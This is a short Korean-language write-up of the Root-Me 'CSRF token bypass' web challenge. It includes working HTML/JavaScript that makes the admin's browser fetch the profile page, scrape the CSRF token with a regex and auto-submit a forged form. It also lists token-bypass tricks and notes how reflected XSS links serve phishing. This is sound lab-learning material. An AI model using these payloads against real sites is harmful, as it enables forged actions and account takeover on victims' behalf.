Rootme.org - csrf token bypass

문제

• 이전 csrf 문제와 동일하다
• contact에서 토큰 검사가 추가되었다.

풀이

• 토큰 우회 시도를 해보았다.

  • 토큰값 없애기
  • 토큰값 바꾸기
    • 안먹힌다.

• 관리자의 토큰을 받아야 한다.

  • request 후에, response를 받고나서 후처리까지 할 수 있다면

  • 관리자로 profile 페이지를 request 하게 만들고 이에 대한 응답에서 관리자의 토큰을 얻은뒤

  • 해당 토큰으로 csrf를 수행하면 될 것이다.

  • AJAX를 이용해서 코딩을 하자

    • 코딩 시도

  • 이유는 모르겠지만 동기방식으로 처리를 해야 request가 처리된다

  • jquery & ajax 이용

    • request는 되지만 response가 안받아와진다.. 포기

      <script src="//ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> 
      <script> 
      $(document).ready(function(){
      $.ajax({
         url: 'http://challenge01.root-me.org/web-client/ch23/?action=profile',
         async: false,
         data: 'aaa=123',
         success: function (data) {
             console.log(data.responseText)
         }
      }); 
      }) 
      </script>

  • ajax 이용

    <form id="profile" action="?action=profile" method="post" enctype="multipart/form-data">
          <input id="username" type="text" name="username" value="test">
          <input id="status" type="checkbox" name="status" checked>
          <input id="token" type="hidden" name="token" value="">
          </form>
    

    <script>
            var xhttp = new XMLHttpRequest();
            xhttp.open("GET", "http://challenge01.root-me.org/web-client/ch23/?action=profile", false);
    
            xhttp.send();
            console.log(xhttp.responseText);
            var token = xhttp.responseText.match(/[abcdef0123456789]{32}/);
            document.getElementById('token').setAttribute('value', token);
            console.log(token[0])
            document.getElementById('profile').submit();
    </script>
    

```

알게된것

• 토큰 우회 in csrf
  1. 토큰값 삭제
  2. 동일한 길이의 임의 값으로 변경
  3. 다른 사용자 토큰 사용해보기
     • 관리자로 글쓰게 하는 csrf일 때, 내가 글쓰기 할때의 토큰을 복사해서 넣어보기
• Reflective XSS 활용
  • 저장이 되지않고 바로 스크립트가 실행되는 XSS 취약점의 형태를 말하는데
  • 이런 취약점은 대게 피싱기법으로 이용될 수 있겠다.
  • 이를테면 Reflective XSS 취약점이 발생하는 쇼핑몰 사이트에서 악의적인 스크립트를 실행시키는 URL을 만들고 피해자에게 피싱한다면, 피해자는 URL 앞부분만 확인하고 안전하다 생각하여 실행해볼 것이다.